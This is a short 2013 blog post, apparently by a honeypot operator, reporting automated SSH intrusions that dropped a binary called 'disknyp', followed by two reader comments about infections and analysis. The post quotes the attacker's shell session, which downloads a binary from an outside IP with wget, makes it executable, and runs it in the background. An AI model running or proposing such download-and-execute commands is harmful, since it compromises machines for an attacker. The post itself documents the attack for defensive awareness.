«
»

disknyp

Yesterday my ssh-honeypot captured 54 samples of “disknyp”.

All logins (probably automated) did the following:

**:~# rm -f disknyp
**:~# rm -f disknop
**:~# wget http://198.2.192.204:22/disknyp
–2013-12-01 03:58:03–  http://198.2.192.204:22/disknyp
Connecting to 198.2.192.204:22… connected.
HTTP request sent, awaiting response… 503 ?????????
**:~# chmod 0777 disknyp
**:~# nohup /root/disknyp > /dev/null 2>&1 &
bash: nohup: command not found
**x:>

The file is a 1491887 Bytes  ELF 32-bit LSB executable. I don’t know yet what it is doing..

Tags:

This entry was posted on Monday, December 2nd, 2013 at 10:03 and is filed under Honeypots. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

2 Responses to “disknyp”

  1. Kent says:
    13. December 2013 at 14:33

    I got this on my Debian box sometime in the past couple weeks but I don’t know where it came from. Started noticing lots of CPU and network activity and saw “disknyp” in the process list. I even got email from my ISP about unusually high traffic.

    The disknyp binary was in the /root directory along with a directory named .o

    I deleted both and things seem to be ok.

  2. gabi says:
    5. December 2013 at 13:57

    Interesting, I’ve recently seen the same lines in a friend’s web server on AWS. Any updates on what does the binary do? Also I was brought here by google with exact the same lines, so the server with this file has been up for a while now. Let me know if you’re interested in joining me for reverse engineering that.

Leave a Reply

You must be logged in to post a comment.